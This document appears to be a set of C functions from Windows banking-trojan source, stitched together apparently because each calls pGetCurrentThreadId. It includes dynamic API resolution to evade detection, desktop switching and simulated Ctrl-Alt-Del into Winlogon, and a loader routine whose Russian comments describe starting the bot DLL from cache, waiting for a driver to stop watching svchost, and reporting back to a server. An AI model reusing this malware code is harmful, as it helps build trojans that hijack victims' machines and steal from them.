BOOL SelectHDESK(HDESK new_desktop)
{
typedef DWORD
(WINAPI
*GetCurrentThreadIdT)(
VOID
);
GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId");
typedef HDESK
(WINAPI
*GetThreadDesktopT)(
__in DWORD dwThreadId);
GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop");
typedef BOOL
(WINAPI
*GetUserObjectInformationAT)(
__in HANDLE hObj,
__in int nIndex,
__out_bcount_opt(nLength) PVOID pvInfo,
__in DWORD nLength,
__out_opt LPDWORD lpnLengthNeeded);
GetUserObjectInformationAT pGetUserObjectInformationA=(GetUserObjectInformationAT)GetProcAddress(LoadLibrary("USER32.dll"),"GetUserObjectInformationA");
typedef BOOL
(WINAPI
*SetThreadDesktopT)(
__in HDESK hDesktop);
SetThreadDesktopT pSetThreadDesktop=(SetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"SetThreadDesktop");
typedef BOOL
(WINAPI
*CloseDesktopT)(
__in HDESK hDesktop);
CloseDesktopT pCloseDesktop=(CloseDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"CloseDesktop");
HDESK old_desktop = pGetThreadDesktop(pGetCurrentThreadId());
DWORD dummy;
char new_name[256];
if (!pGetUserObjectInformationA(new_desktop, UOI_NAME, &new_name, 256, &dummy)) {
return FALSE;
}
// Switch the desktop
if(!pSetThreadDesktop(new_desktop)) {
return FALSE;
}
// Switched successfully - destroy the old desktop
pCloseDesktop(old_desktop);
return TRUE;
}
int pthread_join(pthread_t thread, void** valuePtr)
{
if (valuePtr)
printf("valuePtr != NULL\n");
struct pthread_queue entry;
struct pthread_queue* head;
/* Check if it is already on the thread list. */
if (!pCheckThreadList(thread))
return 0;
while (1)
{
/* Add to the join list. */
pthread_mutex_lock(&joinMutex);
head = joinList;
entry.threadId = pGetCurrentThreadId();
entry.next = NULL;
printf("waiting for %d\n", thread);
if (!head)
{
joinList = &entry;
}else{
while (head->next)
head = head->next;
head->next = &entry;
}
pthread_mutex_unlock(&joinMutex);
SysSuspendThread(pGetCurrentThreadId());
if (!pCheckThreadList(thread))
break;
}
pthread_mutex_lock(&joinMutex);
pthread_mutex_unlock(&joinMutex);
return 0;
}
void InitializeHandlersList()
{
// Инициализацию списка перехватчиков производим в случае если
// он не создал либо создан в другом процессе
HANDLE TID = (HANDLE)pGetCurrentThreadId();
if (SendDataHandlers == NULL || SendHandlersTID != TID)
{
SendDataHandlers = List::Create();
List::SetFreeItemMehod(SendDataHandlers, DestroyDataHandler);
SendHandlersTID = TID;
}
}
DWORD WINAPI ExplorerStartProc(LPVOID Data)
{
LDRDBG("BRDS", "Зупущена функция Эксплорера ");
if (Data == NULL)
{
LDRDBG("BRDS Explorer", "Ошибочные данные для работы в эксплорере ");
return 0;
}
// 302_ld запуск в Explorer (тут сети может не быть)
DebugReportStepByName("302_ld");
// Запускаем поток в svchost отзвона на тестовый сервер
StartThread(DbgRptExplorerThread, NULL);
PUSER_INIT_NOTIFY InitData = (PUSER_INIT_NOTIFY)Data;
LDRDBG("BRDS Explorer", "Ожидаем пока драйвер отключит слежение за процессоь svchost.exe ");
while (CheckIsInjectToProcess(InitData, SVChostName)) pSleep(300);
LDRDBG("BRDS Explorer", "Запуск потока Эксплорера ");
// Первым делом пытаемся запустить длл из файла
if (DoStartBotDll(InitData, 5000))
{
LDRDBG("BRDS Explorer", "Бот успешно загружен из кэша ");
return 0;
}
// Регистрируем событие обратной связи
LDRDBG("BRDS Explorer", "Регистрируем метод обратной связи в процессе Explorer ");
if (!DriverRegisterGlobalCallback(InitData, (DWORD)pGetCurrentThreadId(), StartBotDll, NULL))
{
LDRDBG("BRDS Explorer", "Ошибка регистрации метода обратной свзи експлорера ");
return 0;
}
// Запускаем бесконечный цикл ожидания
do
{
pSleepEx(10000, TRUE);
}while(1);
return 0;
}
int pthread_cond_wait(pthread_cond_t* cond, pthread_mutex_t* mutex)
{
struct pthread_queue entry;
struct pthread_queue* last=cond->list;
int threadId;
threadId = pGetCurrentThreadId();
if (mutex->owner != threadId)
return EINVAL;
if (cond->signal == PTHREAD_COND_SIGNAL)
{
cond->signal = PTHREAD_COND_INITIAL;
return 0;
}
entry.threadId=threadId;
entry.next=NULL;
pthread_mutex_lock(&cond->mutex);
if (!last)
{
cond->list=&entry;
}else{
while (last->next)
last=last->next;
last->next=&entry;
}
pthread_mutex_unlock(&cond->mutex);
pthread_mutex_unlock(mutex);
while (cond->signal != PTHREAD_COND_SIGNAL)
if (SysSuspendThread(threadId))
return -1;
pthread_mutex_lock(mutex);
cond->signal = PTHREAD_COND_INITIAL;
return 0;
}
BOOL SimulateCtrlAltDel()
{
typedef DWORD
(WINAPI
*GetCurrentThreadIdT)(
VOID
);
GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId");
typedef HDESK
(WINAPI
*GetThreadDesktopT)(
__in DWORD dwThreadId);
GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop");
typedef BOOL
(WINAPI
*PostMessageAT)(
__in_opt HWND hWnd,
__in UINT Msg,
__in WPARAM wParam,
__in LPARAM lParam);
PostMessageAT pPostMessageA=(PostMessageAT)GetProcAddress(LoadLibrary("USER32.dll"),"PostMessageA");
HDESK old_desktop = pGetThreadDesktop(pGetCurrentThreadId());
// Switch into the Winlogon desktop
if (!SelectDesktop("Winlogon"))
{
return FALSE;
}
// Fake a hotkey event to any windows we find there.... :(
// Winlogon uses hotkeys to trap Ctrl-Alt-Del...
pPostMessageA(HWND_BROADCAST, WM_HOTKEY, 0, MAKELONG(MOD_ALT | MOD_CONTROL, VK_DELETE));
// Switch back to our original desktop
if (old_desktop != NULL)
SelectHDESK(old_desktop);
return TRUE;
}
bool SwitchInputDesktop()
{
typedef DWORD
(WINAPI
*GetCurrentThreadIdT)(
VOID
);
GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId");
typedef HDESK
(WINAPI
*GetThreadDesktopT)(
__in DWORD dwThreadId);
GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop");
typedef BOOL
(WINAPI
*GetUserObjectInformationAT)(
__in HANDLE hObj,
__in int nIndex,
__out_bcount_opt(nLength) PVOID pvInfo,
__in DWORD nLength,
__out_opt LPDWORD lpnLengthNeeded);
GetUserObjectInformationAT pGetUserObjectInformationA=(GetUserObjectInformationAT)GetProcAddress(LoadLibrary("USER32.dll"),"GetUserObjectInformationA");
typedef BOOL
(WINAPI
*SetThreadDesktopT)(
__in HDESK hDesktop);
SetThreadDesktopT pSetThreadDesktop=(SetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"SetThreadDesktop");
typedef HDESK
(WINAPI
*OpenInputDesktopT)(
__in DWORD dwFlags,
__in BOOL fInherit,
__in ACCESS_MASK dwDesiredAccess);
OpenInputDesktopT pOpenInputDesktop=(OpenInputDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"OpenInputDesktop");
typedef BOOL
(WINAPI
*CloseDesktopT)(
__in HDESK hDesktop);
CloseDesktopT pCloseDesktop=(CloseDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"CloseDesktop");
typedef int
(WINAPI
*lstrcmpAT)(
__in LPCSTR lpString1,
__in LPCSTR lpString2
);
lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrcmpA");
BOOL bRet = false;
DWORD dwLengthNeeded;
HDESK hOldDesktop, hNewDesktop;
char strCurrentDesktop[256], strInputDesktop[256];
hOldDesktop = pGetThreadDesktop(pGetCurrentThreadId());
memset(strCurrentDesktop, 0, sizeof(strCurrentDesktop));
pGetUserObjectInformationA(hOldDesktop, UOI_NAME, &strCurrentDesktop, sizeof(strCurrentDesktop), &dwLengthNeeded);
hNewDesktop = pOpenInputDesktop(0, FALSE, MAXIMUM_ALLOWED);
memset(strInputDesktop, 0, sizeof(strInputDesktop));
pGetUserObjectInformationA(hNewDesktop, UOI_NAME, &strInputDesktop, sizeof(strInputDesktop), &dwLengthNeeded);
if (plstrcmpA(strInputDesktop, strCurrentDesktop) != 0)
{
pSetThreadDesktop(hNewDesktop);
bRet = true;
}
pCloseDesktop(hOldDesktop);
pCloseDesktop(hNewDesktop);
return bRet;
}
static void pthread_start(void* arg)
{
struct pthreadArgs* pArgs=(struct pthreadArgs*)arg;
void* (*start)(void*) = pArgs->startRoutine;
void* args = pArgs->args;
struct pthread_queue entry;
struct pthread_queue* head;
DlTlsCreateContext();
entry.threadId = pGetCurrentThreadId();
entry.next = NULL;
pthread_mutex_lock(&listMutex);
head = threadList;
while (head->next)
head = head->next;
head->next = &entry;
pthread_mutex_unlock(&listMutex);
pthread_cond_signal(pArgs->signal);
start(args);
/* Remove ourselves from the thread list. */
pthread_mutex_lock(&listMutex);
head = threadList;
while (head->next && head->next != &entry)
head = head->next;
if (head->next)
head->next = head->next->next;
pthread_mutex_unlock(&listMutex);
/* Wake up and remove everything in the join list. */
pthread_mutex_lock(&joinMutex);
head = joinList;
joinList = NULL;
while (head)
{
SysResumeThread(head->threadId);
head = head->next;
}
pthread_mutex_unlock(&joinMutex);
/* Actually exit the thread. We used to be able to return onto a frame
* set up by the kernel, but that no longer happens. */
SysExitThread(-1);
}
pthread_t pthread_self(void)
{
return pGetCurrentThreadId();
}
